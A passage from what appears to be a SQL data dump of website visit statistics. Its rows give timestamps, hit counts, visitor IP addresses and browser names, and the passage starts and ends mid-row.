6.178.37','firefox'),(38114,1462268634,1,0,1,0,'68.180.229.171',''),(38115,1462268932,1,0,1,0,'66.249.78.136',''),(38116,1462270711,3,0,3,0,'68.180.229.171',''),(38117,1462272442,1,1,0,0,'130.180.219.184','opera'),(38118,1462273094,1,1,0,0,'91.121.221.15','other'),(38119,1462277477,1,0,1,0,'66.249.78.164',''),(38120,1462277758,1,1,0,0,'66.249.78.178','chrome'),(38121,1462279497,1,0,1,0,'66.249.78.136',''),(38122,1462280359,1,0,1,0,'68.180.229.171',''),(38123,1462281082,1,1,0,0,'46.211.2.92','chrome'),(38124,1462282990,1,1,0,0,'91.196.178.167','firefox'),(38125,1462284219,1,1,0,0,'180.76.15.5','other'),(38126,1462287656,1,1,0,0,'66.249.78.136','chrome'),(38127,1462288868,1,1,0,0,'66.249.78.150','chrome'),(38128,1462289476,1,1,0,0,'37.54.23.238','firefox'),(38129,1462289752,1,1,0,0,'188.163.103.220','chrome'),(38130,1462290227,1,0,1,0,'66.249.78.171',''),(38131,1462292995,1,0,1,0,'66.249.78.136',''),(38132,1462295504,1,1,0,0,'178.93.148.217','chrome'),(38133,1462298978,1,1,0,0,'91.196.178.71','chrome'),(38134,1462299046,1,1,0,0,'93.73.234.193','firefox'),(38135,1462301589,1,0,1,0,'66.249.78.171',''),(38136,1462302602,2,0,2,0,'68.180.229.171',''),(38137,1462306058,1,0,1,0,'66.249.78.143',''),(38138,1462306256,1,1,0,0,'195.34.204.152','chrome'),(38139,1462312045,1,0,1,0,'66.249.78.171',''),(38140,1462320267,1,0,1,0,'66.249.78.136',''),(38141,1462328966,1,1,0,0,'180.76.15.145','other'),(38142,1462329414,1,1,0,0,'66.249.78.178','chrome'),(38143,1462330056,2,1,1,0,'66.249.78.171',''),(38144,1462331381,1,1,0,0,'66.249.78.171','chrome'),(38145,1462335000,1,0,1,0,'66.249.78.136',''),(38146,1462335146,1,0,1,0,'66.249.78.178',''),(38147,1462336024,1,0,1,0,'66.249.78.143',''),(38148,1462336843,1,0,1,0,'66.249.78.164',''),(38149,1462336897,1,0,1,0,'66.249.78.150',''),(38150,1462337298,1,1,0,0,'157.55.39.152','other'),(38151,1462339514,1,1,0,0,'91.196.178.72','chrome'),(38152,1462339670,16,16,0,0,'157.55.39.220','other'),(38153,1462339687,17,17,0,0,'207.46.13.56','other'),(38154,1462339721,17,17,0,0,'157.55.39.152','other'),(38155,1462342370,1,1,0,0,'91.196.178.69','chrome'),(38156,1462343563,1,1,0,0,'66.249.93.153','chrome'),(38157,1462343580,1,1,0,0,'91.196.178.71','firefox'),(38158,1462344328,1,0,1,0,'66.249.78.143',''),(38159,1462344531,1,1,0,0,'91.196.176.13','chrome'),(38160,1462346342,1,1,0,0,'69.30.213.138','other'),(38161,1462346567,1,0,1,0,'66.249.66.79',''),(38162,1462346898,1,1,0,0,'141.0.15.176','other'),(38163,1462347035,1,1,0,0,'141.0.15.176','chrome'),(38164,1462347036,1,1,0,0,'141.0.15.176','opera'),(38165,1462347432,1,1,0,0,'91.196.178.71','firefox'),(38166,1462347523,1,1,0,0,'82.145.218.125','other'),(38167,1462350007,1,1,0,0,'91.196.178.71','firefox'),(38168,1462351024,1,1,0,0,'66.249.66.79','chrome'),(38169,1462351277,1,1,0,0,'141.0.14.228','opera'),(38170,1462351492,1,1,0,0,'37.55.8.219','chrome'),(38171,1462351884,1,1,0,0,'94.179.39.166','chrome'),(38172,1462352404,1,1,0,0,'91.196.178.71','firefox'),(38173,1462354107,1,1,0,0,'194.183.179.74','firefox'),(38174,1462354862,1,1,0,0,'91.196.177.144','chrome'),(38175,1462355778,1,1,0,0,'91.196.177.144','chrome'),(38176,1462357407,1,1,0,0,'91.196.178.163','chrome'),(38177,1462358163,1,1,0,0,'37.73.211.77','chrome'),(38178,1462358192,1,1,0,0,'46.173.102.24','chrome'),(38179,1462359802,1,0,1,0,'66.249.78.136',''),(38180,1462359966,1,1,0,0,'157.55.39.152','other'),(38181,1462361371,1,0,1,0,'66.249.78.164',''),(38182,1462361968,1,0,1,0,'66.249.78.150',''),(38183,1462362991,1,0,1,0,'66.249.78.178',''),(38184,1462363857,1,1,0,0,'193.29.204.4','chrome'),(38185,1462365051,1,1,0,0,'95.132.61.94','chrome'),(38186,1462365471,1,1,0,0,'212.1.108.150','msie'),(38187,1462366429,1,1,0,0,'94.178.219.128','chrome'),(38189,1462366734,1,1,0,0,'95.132.61.94','chrome'),(38190,1462366911,3,3,0,0,'46.4.32.75','other'),(38191,1462366933,1,1,0,0,'91.196.178.130','firefox'),(38192,1462367452,262,262,0,0,'51.254.141.216','other'),(38193,1462367679,1,1,0,0,'91.196.178.71','firefox'),(38194,1462368601,1,1,0,0,'91.196.177.144','chrome'),(38195,1462369423,1,1,0,0,'91.196.178.68','chrome'),(38196,1462369714,1,1,0,0,'5.9.62.130','other'),(38197,1462369988,1,1,0,0,'95.132.61.94','chrome'),(38198,1462372090,1,1,0,0,'62.80.169.116','chrome'),(38199,1462372431,1,1,0,0,'91.196.177.144','chrome'),(38200,1462372536,1,1,0,0,'37.52.179.236','chrome'),(38201,1462372651,1,1,0,0,'94.178.219.128','chrome'),(38202,1462372989,1,1,0,0,'142.54.184.90','other'),(38203,1462373381,1,0,1,0,'66.249.78.178',''),(38204,1462374490,1,0,1,0,'66.249.78.136',''),(38205,1462374902,1,1,0,0,'66.249.66.57','chrome'),(38206,1462375336,1,1,0,0,'91.196.178.68','firefox'),(38207,1462375740,49,49,0,0,'62.210.143.245','other'),(38208,1462376840,1,1,0,0,'94.178.43.232','firefox'),(38209,1462377240,2,2,0,0,'91.196.178.164','chrome'),(38210,1462379496,1,1,0,0,'130.180.217.0','chrome'),(38211,1462380224,1,0,1,0,'66.249.78.164',''),(38212,1462380995,1,1,0,0,'92.112.161.181','firefox'),(38213,1462382567,1,1,0,0,'180.76.15.20','other'),(38214,1462382890,1,1,0,0,'95.221.201.64','chrome'),(38215,1462385157,1,1,0,0,'92.112.140.40','firefox'),(38216,1462387176,1,0,1,0,'66.249.78.150',''),(38217,1462387495,1,1,0,0,'66.249.78.136','chrome'),(38218,1462387726,1,1,0,0,'91.196.178.33','chrome'),(38219,1462387760,2,2,0,0,'95.213.218.92','other'),(38220,1462388772,1,1,0,0,'91.196.178.70','firefox'),(38221,1462390265,1,1,0,0,'54.213.77.102','opera'),(38222,1462390714,1,0,1,0,'66.249.78.178',''),(38223,1462391507,1,1,0,0,'46.219.241.160','chrome'),(38224,1462394272,1,0,1,0,'68.180.229.171',''),(38225,1462399762,1,0,1,0,'66.249.78.143',''),(38226,1462403920,1,0,1,0,'66.249.66.82',''),(38227,1462404307,300,300,0,0,'212.83.177.193','other'),(38228,1462414053,1,0,1,0,'66.249.78.143',''),(38229,1462414566,1,0,1,0,'66.249.78.164',''),(38230,1462415112,1,1,0,0,'40.77.167.95','other'),(38231,1462416604,1,0,1,0,'66.249.78.164',''),(38232,1462420478,1,1,0,0,'149.62.24.125','msie'),(38233,1462420479,1,1,0,0,'37.110.110.188','firefox'),(38234,1462420480,1,1,0,0,'95.84.179.135','chrome'),(38235,1462420481,1,1,0,0,'37.110.110.188','chrome'),(38236,1462420484,1,1,0,0,'95.25.202.35','chrome'),(38237,1462423066,1,1,0,0,'157.55.39.220','other'),(38238,1462425294,1,1,0,0,'109.149.177.137','other'),(38239,1462425434,52,52,0,0,'157.55.39.245','other'),(38240,1462425563,38,38,0,0,'157.55.39.220','other'),(38241,1462426791,1,1,0,0,'66.249.93.153','chrome'),(38242,1462427893,1,1,0,0,'91.196.178.71','firefox'),(38243,1462428391,1,1,0,0,'37.52.156.42','chrome'),(38244,1462428434,1,1,0,0,'141.8.183.14','other'),(38245,1462429177,1,0,1,0,'66.249.78.150',''),(38246,1462429949,1,0,1,0,'66.249.78.171',''),(38247,1462430478,1,1,0,0,'37.52.156.42','chrome'),(38248,1462430977,1,1,0,0,'91.196.178.71','firefox'),(38249,1462431117,1,1,0,0,'141.8.142.62','other'),(38250,1462431890,1,0,1,0,'66.249.78.178',''),(38251,1462432026,2,2,0,0,'91.196.178.66','chrome'),(38252,1462432398,1,1,0,0,'37.54.103.241','chrome'),(38253,1462432700,1,1,0,0,'195.189.196.49','chrome'),(38254,1462433515,1,1,0,0,'91.196.178.69','chrome'),(38255,1462433541,1,0,1,0,'66.249.78.164',''),(38256,1462433635,1,1,0,0,'95.132.30.38','firefox'),(38257,1462434373,1,1,0,0,'91.196.178.66','chrome'),(38258,1462434548,1,1,0,0,'178.154.189.31','other'),(38259,1462435662,1,1,0,0,'91.196.178.71','firefox'),(38260,1462436626,1,1,0,0,'91.196.178.65','firefox'),(38261,1462436943,1,0,1,0,'66.249.78.136',''),(38262,1462436992,1,1,0,0,'66.249.78.171','chrome'),(38263,1462437005,1,1,0,0,'82.145.218.156','other'),(38264,1462437334,1,1,0,0,'37.53.255.200','chrome'),(38265,1462438154,31,31,0,0,'51.255.51.26','other'),(38266,1462438204,1,1,0,0,'178.95.247.222','chrome'),(38267,1462438280,3,3,0,0,'46.4.120.3','other'),(38268,1462438708,2,2,0,0,'207.46.13.57','other'),(38269,1462438712,4,4,0,0,'157.55.39.245','other'),(38270,1462438811,1,1,0,0,'91.192.137.209','chrome'),(38271,1462440045,1,1,0,0,'141.8.132.105','other'),(38272,1462441040,1,1,0,0,'91.196.178.134','firefox'),(38273,1462441191,1,1,0,0,'195.34.204.159','opera'),(38274,1462442277,1,1,0,0,'91.196.178.134','firefox'),(38275,1462443542,1,1,0,0,'178.94.176.252','other'),(38276,1462444030,1,0,1,0,'66.249.78.164',''),(38277,1462444740,1,0,1,0,'66.249.78.178',''),(38278,1462447021,1,1,0,0,'207.46.13.57','other'),(38279,1462447752,1,1,0,0,'212.26.140.59','firefox'),(38280,1462447842,1,1,0,0,'91.196.178.69','chrome'),(38281,1462448145,1,1,0,0,'180.76.15.145','other'),(38282,1462448846,1,1,0,0,'91.196.178.161','chrome'),(38283,1462449452,1,1,0,0,'141.8.183.25','other'),(38284,1462449573,1,1,0,0,'130.193.50.34','other'),(38285,1462450885,1,1,0,0,'178.94.214.251','firefox'),(38286,1462451482,1,0,1,0,'66.249.78.150',''),(38287,1462451782,1,1,0,0,'207.46.13.57','other'),(38288,1462452786,1,0,1,0,'66.249.78.164',''),(38289,1462453222,1,1,0,0,'91.196.178.71','firefox'),(38290,1462453602,1,1,0,0,'37.53.255.200','chrome'),(38291,1462455290,1,1,0,0,'207.46.13.57','other'),(38292,1462457330,2,0,2,0,'66.249.78.143',''),(38293,1462457889,1,0,1,0,'66.249.78.150',''),(38294,1462458179,1,1,0,0,'5.255.253.67','other'),(38295,1462458325,1,1,0,0,'94.179.24.219','chrome'),(38296,1462458414,74,74,0,0,'94.208.145.95','other'),(38297,1462459868,1,0,1,0,'66.249.64.244',''),(38298,1462459979,1,0,1,0,'66.249.64.249',''),(38299,1462460197,1,0,1,0,'66.249.64.118',''),(38300,1462462964,1,1,0,0,'141.8.132.105','other'),(38301,1462463175,1,0,1,0,'66.249.64.249',''),(38302,1462463258,1,0,1,0,'66.249.64.239',''),(38303,1462463288,2,0,2,0,'66.249.64.244',''),(38304,1462464007,1,1,0,0,'64.74.215.1','chrome'),(38305,1462465435,33,33,0,0,'5.9.87.111','other'),(38306,1462465624,1,1,0,0,'91.196.178.37','firefox'),(38307,1462466015,1,1,0,0,'37.54.19.164','firefox'),(38308,1462466394,1,0,1,0,'66.249.64.249',''),(38309,1462466468,1,0,1,0,'66.249.64.175',''),(38310,1462467534,1,0,1,0,'66.249.64.239',''),(38311,1462468906,1,1,0,0,'91.196.178.70','firefox'),(38312,1462469192,65,65,0,0,'91.121.101.78','other'),(38313,1462472206,1,1,0,0,'193.194.127.217','firefox'),(38314,1462472866,1,1,0,0,'95.133.50.126','opera'),(38315,1462473829,1,0,1,0,'66.249.64.180',''),(38316,1462473898,2,2,0,0,'91.196.178.163','chrome'),(38317,1462475034,1,0,1,0,'66.249.64.239',''),(38318,1462475937,1,0,1,0,'66.249.64.239',''),(38319,1462476016,1,1,0,0,'130.193.50.34','other'),(38320,1462476337,1,1,0,0,'66.249.64.239','chrome'),(38321,1462480435,1,0,1,0,'66.249.64.175',''),(38322,1462480556,1,0,1,0,'66.249.64.249',''),(38323,1462480962,1,1,0,0,'141.8.132.105','other'),(38324,1462481196,1,1,0,0,'130.193.50.34','other'),(38325,1462481617,1,0,1,0,'66.249.64.180',''),(38326,1462482704,1,1,0,0,'40.77.167.95','other'),(38327,1462483715,1,0,1,0,'66.249.64.244',''),(38328,1462483867,1,1,0,0,'40.77.167.95','other'),(38329,1462483913,1,1,0,0,'207.46.13.57','other'),(38330,1462484080,1,1,0,0,'66.249.64.170','chrome'),(38331,1462484702,1,0,1,0,'68.180.229.171',''),(38332,1462485083,1,1,0,0,'5.153.233.130','msie'),(38333,1462486263,1,0,1,0,'66.249.64.249',''),(38334,1462488099,1,1,0,0,'130.193.50.38','other'),(38335,1462490642,1,0,1,0,'66.249.64.239',''),(38336,1462490962,1,1,0,0,'66.249.64.170','chrome'),(38337,1462501427,1,0,1,0,'66.249.64.239',''),(38338,1462504653,1,1,0,0,'82.145.210.10','other'),(38339,1462505857,1,1,0,0,'91.196.178.67','chrome'),(38340,1462507183,1,1,0,0,'207.46.13.57','other'),(38341,1462507391,1,1,0,0,'40.77.167.95','other'),(38342,1462507813,1,0,1,0,'66.249.64.175',''),(38343,1462508640,1,1,0,0,'40.77.167.95','other'),(38344,1462509968,1,0,1,0,'66.249.64.249',''),(38345,1462511324,1,1,0,0,'91.196.178.71','firefox'),(38346,1462511859,1,1,0,0,'130.193.51.83','other'),(38347,1462511984,1,1,0,0,'82.145.211.198','opera'),(38348,1462512150,1,1,0,0,'91.196.178.72','firefox'),(38349,1462512177,1,1,0,0,'141.8.183.25','other'),(38350,1462512212,1,1,0,0,'91.196.178.69','firefox'),(38351,1462515407,1,1,0,0,'130.193.50.34','other'),(38352,1462515536,1,1,0,0,'5.255.253.113','other'),(38353,1462515742,1,1,0,0,'94.179.93.247','opera'),(38354,1462516297,1,1,0,0,'91.196.178.69','chrome'),(38355,1462517591,1,1,0,0,'91.196.178.71','firefox'),(38356,1462517704,1,1,0,0,'130.193.50.34','other'),(38357,1462517729,1,1,0,0,'141.8.132.105','other'),(38358,1462518569,1,1,0,0,'208.43.225.84','other'),(38359,1462518943,2,2,0,0,'91.196.178.71','firefox'),(38360,1462519472,1,1,0,0,'141.8.132.105','other'),(38361,1462519805,1,1,0,0,'66.249.93.147','chrome'),(38362,1462520049,1,1,0,0,'91.196.178.161','chrome'),(38363,1462521073,1,0,1,0,'66.249.64.244',''),(38364,1462521102,1,1,0,0,'91.196.178.71','firefox'),(38365,1462522057,1,1,0,0,'95.132.77.37','firefox'),(38366,1462522183,1,1,0,0,'37.54.20.245','chrome'),(38367,1462522595,1,1,0,0,'66.249.64.170','chrome'),(38368,1462522692,1,1,0,0,'91.196.178.71','firefox'),(38369,1462524287,1,1,0,0,'157.55.39.220','other'),(38370,1462524747,1,1,0,0,'82.207.49.54','chrome'),(38371,1462525827,1,1,0,0,'180.76.15.162','other'),(38372,1462527113,1,1,0,0,'5.255.253.53','other'),(38373,1462527117,1,1,0,0,'5.255.253.68','other'),(38374,1462527125,1,1,0,0,'91.196.178.65','firefox'),(38375,1462529422,1,1,0,0,'141.8.132.30','other'),(38376,1462529683,1,1,0,0,'91.196.178.69','firefox'),(38377,1462531725,1,1,0,0,'130.193.51.43','other'),(38378,1462532112,1,1,0,0,'91.196.178.65','firefox'),(38379,1462533899,1,1,0,0,'82.145.218.219','opera'),(38380,1462535308,1,1,0,0,'93.158.152.75','other'),(38381,1462535777,1,1,0,0,'180.76.15.13','other'),(38382,1462538429,1,1,0,0,'93.158.152.75','other'),(38383,1462538556,1,1,0,0,'93.158.152.26','other'),(38384,1462538782,1,1,0,0,'94.179.39.217','firefox'),(38385,1462540847,1,0,1,0,'66.249.78.164',''),(38386,1462543720,1,1,0,0,'141.8.142.78','other'),(38387,1462543889,1,1,0,0,'130.193.51.45','other'),(38388,1462544073,1,1,0,0,'141.8.183.14','other'),(38389,1462544207,1,1,0,0,'141.8.183.25','other'),(38390,1462544351,1,1,0,0,'93.158.152.40','other'),(38391,1462544482,1,1,0,0,'141.8.132.2','other'),(38392,1462544649,1,1,0,0,'5.255.253.100','other'),(38393,1462545922,1,1,0,0,'141.8.183.19','other'),(38394,1462546281,75,75,0,0,'78.46.50.246','other'),(38395,1462546447,1,1,0,0,'207.46.13.57','other'),(38396,1462547693,1,1,0,0,'40.77.167.95','other'),(38397,1462548361,1,1,0,0,'91.196.178.67','firefox'),(38398,1462549153,1,1,0,0,'178.92.251.1','firefox'),(38399,1462550138,1,1,0,0,'141.8.142.78','other'),(38400,1462551430,1,1,0,0,'110.45.153.30','other'),(38401,1462551927,1,1,0,0,'157.55.39.220','other'),(38402,1462552492,1,1,0,0,'141.8.142.67','other'),(38403,1462552760,1,1,0,0,'130.193.51.79','other'),(38404,1462552914,1,1,0,0,'141.8.132.10','other'),(38405,1462553074,1,1,0,0,'141.8.132.83','other'),(38406,1462554354,1,1,0,0,'64.74.215.1','chrome'),(38407,1462555822,1,1,0,0,'178.154.149.11','other'),(38408,1462556911,2,2,0,0,'5.255.253.67','other'),(38409,1462556915,1,1,0,0,'141.8.132.101','other'),(38410,1462557771,1,1,0,0,'193.194.127.217','firefox'),(38411,1462557964,1,1,0,0,'51.254.130.61','other'),(38412,1462558840,1,1,0,0,'193.194.127.217','firefox'),(38413,1462559483,1,1,0,0,'178.92.251.1','firefox'),(38414,1462560133,1,1,0,0,'5.255.253.47','other'),(38415,1462560192,1,1,0,0,'91.196.178.33','chrome'),(38416,1462560258,1,1,0,0,'5.255.253.9','other'),(38417,1462560406,1,1,0,0,'5.255.253.53','other'),(38418,1462561620,9,9,0,0,'80.91.162.99','other'),(38419,1462563314,1,1,0,0,'5.255.253.47','other'),(38420,1462567362,1,1,0,0,'141.8.183.14','other'),(38421,1462572686,1,1,0,0,'40.77.167.95','other'),(38422,1462574625,1,1,0,0,'141.8.132.105','other'),(38423,1462577611,1,1,0,0,'141.8.183.25','other'),(38424,1462578088,1,1,0,0,'141.8.132.105','other'),(38425,1462578250,1,1,0,0,'5.255.253.53','other'),(38426,1462578409,1,1,0,0,'141.8.132.10','other'),(38427,1462581639,1,1,0,0,'141.8.132.99','other'),(38428,1462581788,1,1,0,0,'141.8.142.58','other'),(38429,1462582933,1,1,0,0,'40.77.167.95','other'),(38430,1462586490,1,1,0,0,'40.77.167.85','other'),(38431,1462594516,1,1,0,0,'130.193.50.32','other'),(38432,1462596684,1,1,0,0,'207.46.13.78','other'),(38433,1462597623,1,1,0,0,'178.92.251.1','firefox'),(38434,1462599582,1,1,0,0,'207.46.13.30','other'),(38435,1462601190,1,0,1,0,'66.249.78.150',''),(38436,1462602860,1,1,0,0,'178.154.189.202','other'),(38437,1462602886,1,1,0,0,'5.255.253.53','other'),(38438,1462602924,1,1,0,0,'180.76.15.28','other'),(38439,1462603588,1,1,0,0,'66.249.93.147','chrome'),(38440,1462604129,1,1,0,0,'93.158.152.202','other'),(38441,1462606103,1,1,0,0,'94.179.48.173','firefox'),(38442,1462610093,1,0,1,0,'66.249.78.171',''),(38443,1462610604,1,1,0,0,'178.154.189.202','other'),(38444,1462614946,1,1,0,0,'82.145.211.31','opera'),(38445,1462615014,5,5,0,0,'69.30.213.202','other'),(38446,1462615451,300,300,0,0,'51.254.215.130','other'),(38447,1462615915,1,1,0,0,'5.255.253.9','other'),(38448,1462617479,1,1,0,0,'141.8.132.10','other'),(38449,1462620873,1,0,1,0,'66.249.78.136',''),(38450,1462624831,1,1,0,0,'91.196.178.161','firefox'),(38451,1462626810,24,24,0,0,'93.219.87.239','other'),(38452,1462627692,1,1,0,0,'141.8.132.105','other'),(38453,1462629049,300,300,0,0,'144.76.29.162','other'),(38454,1462630105,1,1,0,0,'89.178.70.181','msie'),(38455,1462631120,1,0,1,0,'66.249.78.171',''),(38456,1462631359,2,2,0,0,'130.193.50.34','other'),(38457,1462635207,1,1,0,0,'91.196.178.37','firefox'),(38458,1462636341,1,1,0,0,'91.196.178.165','chrome'),(38459,1462637995,1,1,0,0,'92.113.189.168','firefox'),(38460,1462639530,1,0,1,0,'66.249.69.180',''),(38461,1462640496,1,1,0,0,'141.8.132.105','other'),(38462,1462640502,1,1,0,0,'180.76.15.161','other'),(38463,1462644717,1,0,1,0,'66.249.75.40',''),(38464,1462646012,1,0,1,0,'66.249.69.170',''),(38465,1462649490,1,1,0,0,'130.193.50.34','other'),(38466,1462650490,1,0,1,0,'66.249.75.32',''),(38467,1462652745,1,0,1,0,'66.249.69.170',''),(38468,1462653936,1,1,0,0,'66.249.69.175','chrome'),(38469,1462655639,1,1,0,0,'66.249.69.175','chrome'),(38470,1462656000,1,0,1,0,'66.249.69.170',''),(38471,1462656446,1,1,0,0,'66.249.75.40','chrome'),(38472,1462656630,1,1,0,0,'66.249.69.180','chrome'),(38473,1462658940,1,0,1,0,'68.180.229.171',''),(38474,1462662219,1,1,0,0,'66.249.69.180','chrome'),(38475,1462663245,1,1,0,0,'5.255.253.113','other'),(38476,1462666039,1,1,0,0,'66.249.69.175','chrome'),(38477,1462668946,1,1,0,0,'207.46.13.78','other'),(38478,1462669012,1,1,0,0,'207.46.13.82','other'),(38479,1462672658,1,1,0,0,'207.46.13.82','other'),(38480,1462673903,1,0,1,0,'66.249.75.32',''),(38481,1462673908,1,0,1,0,'66.249.69.180',''),(38482,1462674466,1,1,0,0,'130.193.50.34','other'),(38483,1462678565,1,1,0,0,'130.193.50.34','other'),(38484,1462678571,1,1,0,0,'141.8.142.58','other'),(38485,1462681949,1,1,0,0,'51.254.215.130','other'),(38486,1462682818,1,0,1,0,'66.249.69.175',''),(38487,1462685501,1,1,0,0,'92.113.189.168','firefox'),(38488,1462688751,1,1,0,0,'92.113.189.168','firefox'),(38489,1462689467,71,71,0,0,'162.210.196.100','other'),(38490,1462691509,1,1,0,0,'66.249.93.153','chrome'),(38491,1462692112,1,1,0,0,'92.113.189.168','firefox'),(38492,1462695615,1,1,0,0,'66.249.69.180','chrome'),(38493,1462696382,1,1,0,0,'130.193.50.34','other'),(38494,1462699593,1,1,0,0,'141.8.132.101','other'),(38495,1462700655,1,1,0,0,'130.193.51.79','other'),(38496,1462702287,1,0,1,0,'66.249.75.32',''),(38497,1462702399,111,111,0,0,'149.202.49.23','other'),(38498,1462702434,1,0,1,0,'66.249.69.175',''),(38499,1462702726,1,1,0,0,'92.113.189.168','firefox'),(38500,1462704343,1,1,0,0,'66.249.75.32','chrome'),(38501,1462706871,1,1,0,0,'66.249.69.180','chrome'),(38502,1462707143,1,1,0,0,'66.249.69.170','chrome'),(38503,1462708172,1,1,0,0,'66.249.69.175','chrome'),(38504,1462709026,1,1,0,0,'92.113.189.168','firefox'),(38505,1462709494,1,1,0,0,'130.193.50.34','other'),(38506,1462711041,1,1,0,0,'85.114.211.241','chrome'),(38507,1462711328,1,0,1,0,'66.249.64.113',''),(38508,1462713005,1,1,0,0,'188.143.232.15','msie'),(38509,1462713324,1,1,0,0,'130.193.50.34','other'),(38510,1462714600,1,1,0,0,'66.249.64.108','chrome'),(38511,1462715313,1,0,1,0,'66.249.64.118',''),(38512,1462715958,1,0,1,0,'66.249.64.244',''),(38513,1462716991,1,1,0,0,'66.249.64.118','chrome'),(38514,1462717352,1,1,0,0,'66.249.64.113','chrome'),(38515,1462717498,1,1,0,0,'193.194.127.217','firefox'),(38516,1462724466,1,1,0,0,'92.113.189.168','firefox'),(38517,1462725363,1,1,0,0,'66.249.64.244','chrome'),(38518,1462728175,1,1,0,0,'130.0.46.245','firefox'),(38519,1462728474,1,1,0,0,'130.180.218.154','chrome'),(38520,1462728505,1,1,0,0,'141.8.132.105','other'),(38521,1462729702,2,2,0,0,'130.180.218.154','chrome'),(38522,1462729947,1,1,0,0,'141.8.132.105','other'),(38523,1462730048,1,0,1,0,'66.249.64.118',''),(38524,1462730663,1,1,0,0,'46.73.242.141','chrome'),(38525,1462732573,1,1,0,0,'66.249.64.244','chrome'),(38526,1462734443,1,0,1,0,'66.249.64.244',''),(38527,1462735161,1,1,0,0,'94.179.158.179','chrome'),(38528,1462736634,1,1,0,0,'130.180.218.201','chrome'),(38529,1462738454,1,1,0,0,'95.158.53.180','chrome'),(38530,1462738489,9,9,0,0,'93.219.101.86','other'),(38531,1462743865,1,1,0,0,'130.193.51.83','other'),(38532,1462745585,2,1,1,0,'66.249.64.113',''),(38533,1462745817,1,1,0,0,'178.154.189.37','other'),(38534,1462748180,2,2,0,0,'5.255.253.67','other'),(38535,1462748240,1,1,0,0,'130.193.50.38','other'),(38536,1462748328,1,1,0,0,'141.8.132.10','other'),(38537,1462748385,1,1,0,0,'130.193.51.79','other'),(38538,1462748573,1,1,0,0,'93.158.152.84','other'),(38539,1462748577,1,1,0,0,'93.158.152.9','other'),(38540,1462748774,1,1,0,0,'141.8.132.83','other'),(38541,1462748818,1,1,0,0,'5.255.253.68','other'),(38542,1462748867,1,1,0,0,'141.8.183.25','other'),(38543,1462751876,9,9,0,0,'130.193.50.34','other'),(38544,1462751878,1,1,0,0,'5.255.253.113','other'),(38545,1462752176,2,2,0,0,'141.8.183.25','other'),(38546,1462752447,1,0,1,0,'66.249.64.239',''),(38547,1462752683,5,5,0,0,'141.8.132.105','other'),(38548,1462752828,2,2,0,0,'5.255.253.113','other'),(38549,1462752887,4,4,0,0,'130.193.50.34','other'),(38550,1462753841,3,3,0,0,'130.193.50.34','other'),(38551,1462753931,1,1,0,0,'5.255.253.113','other'),(38552,1462754041,3,3,0,0,'141.8.132.105','other'),(38553,1462754909,3,3,0,0,'141.8.183.25','other'),(38554,1462755080,1,1,0,0,'141.8.132.105','other'),(38555,1462755399,3,3,0,0,'130.193.50.34','other'),(38556,1462755615,182,182,0,0,'158.69.200.204','other'),(38557,1462755856,1,1,0,0,'46.4.116.197','other'),(38558,1462755984,2,2,0,0,'141.8.132.105','other'),(38559,1462756129,1,1,0,0,'141.8.183.25','other'),(38560,1462758340,1,1,0,0,'178.154.149.10','other'),(38561,1462758366,1,1,0,0,'130.193.50.34','other'),(38562,1462758466,1,1,0,0,'130.193.51.83','other'),(38563,1462758594,1,1,0,0,'141.8.142.67','other'),(38564,1462758720,1,1,0,0,'141.8.132.105','other'),(38565,1462758847,1,1,0,0,'5.255.253.113','other'),(38566,1462759265,1,1,0,0,'141.8.183.25','other'),(38567,1462761525,2,2,0,0,'141.8.183.25','other'),(38568,1462761780,1,1,0,0,'130.193.50.34','other'),(38569,1462762494,1,1,0,0,'180.76.15.17','other'),(38570,1462766678,4,4,0,0,'130.193.50.34','other'),(38571,1462767449,2,2,0,0,'141.8.183.25','other'),(38572,1462767597,1,1,0,0,'141.8.132.105','other'),(38573,1462768569,1,1,0,0,'46.201.174.57','chrome'),(38574,1462772175,1,1,0,0,'207.46.13.78','other'),(38575,1462775385,1,1,0,0,'207.46.13.82','other'),(38576,1462778445,1,1,0,0,'66.249.93.147','chrome'),(38577,1462779458,2,2,0,0,'92.113.189.168','firefox'),(38578,1462780300,1,1,0,0,'130.180.218.121','chrome'),(38579,1462780486,1,1,0,0,'130.193.50.34','other'),(38580,1462781013,1,1,0,0,'141.8.183.25','other'),(38581,1462781141,1,1,0,0,'66.249.64.249','chrome'),(38582,1462781201,1,1,0,0,'141.8.132.105','other'),(38583,1462783515,1,1,0,0,'91.196.178.162','chrome'),(38584,1462785789,1,1,0,0,'141.8.132.105','other'),(38585,1462785805,1,1,0,0,'37.110.109.243','chrome'),(38586,1462785920,1,1,0,0,'130.193.51.19','other'),(38587,1462786683,1,0,1,0,'68.180.229.171',''),(38588,1462787225,1,0,1,0,'66.249.64.113',''),(38589,1462788381,1,1,0,0,'66.249.64.118','chrome'),(38590,1462788608,2,2,0,0,'5.9.123.116','other'),(38591,1462788973,1,1,0,0,'144.76.61.21','other'),(38592,1462789618,1,1,0,0,'5.255.253.113','other'),(38593,1462789785,13,13,0,0,'85.25.211.229','chrome'),(38596,1462789786,20,20,0,0,'85.25.211.229','msie'),(38597,1462789787,15,15,0,0,'85.25.211.229','firefox'),(38598,1462790066,56,56,0,0,'46.4.120.3','other'),(38599,1462792287,2,0,2,0,'66.249.64.239',''),(38600,1462795453,1,1,0,0,'91.196.178.136','chrome'),(38601,1462795621,1,1,0,0,'91.196.178.37','firefox'),(38602,1462796259,1,1,0,0,'66.249.78.164','chrome'),(38603,1462798578,1,1,0,0,'130.193.50.34','other'),(38604,1462798704,1,1,0,0,'141.8.132.105','other'),(38605,1462799775,1,1,0,0,'92.113.189.168','firefox'),(38606,1462802217,1,0,1,0,'66.249.78.143',''),(38607,1462803869,1,1,0,0,'180.76.15.142','other'),(38608,1462804553,1,1,0,0,'130.180.218.54','chrome'),(38609,1462804703,1,1,0,0,'141.8.142.58','other'),(38610,1462807058,1,1,0,0,'37.9.122.202','other'),(38611,1462807835,1,1,0,0,'178.154.189.201','other'),(38612,1462808062,1,1,0,0,'195.128.182.31','other'),(38613,1462808345,1,1,0,0,'141.8.142.1','other'),(38614,1462810111,1,0,1,0,'66.249.78.164',''),(38615,1462810239,1,0,1,0,'66.249.78.143',''),(38616,1462810584,1,0,1,0,'66.249.78.171',''),(38617,1462810676,1,1,0,0,'157.55.39.32','other'),(38618,1462811098,1,1,0,0,'141.8.183.25','other'),(38619,1462811238,1,1,0,0,'141.8.132.105','other'),(38620,1462811385,1,1,0,0,'92.113.189.168','firefox'),(38621,1462812172,1,1,0,0,'178.154.189.201','other'),(38622,1462814539,1,1,0,0,'91.196.178.38','chrome'),(38623,1462814564,1,1,0,0,'130.193.50.34','other'),(38624,1462815729,1,1,0,0,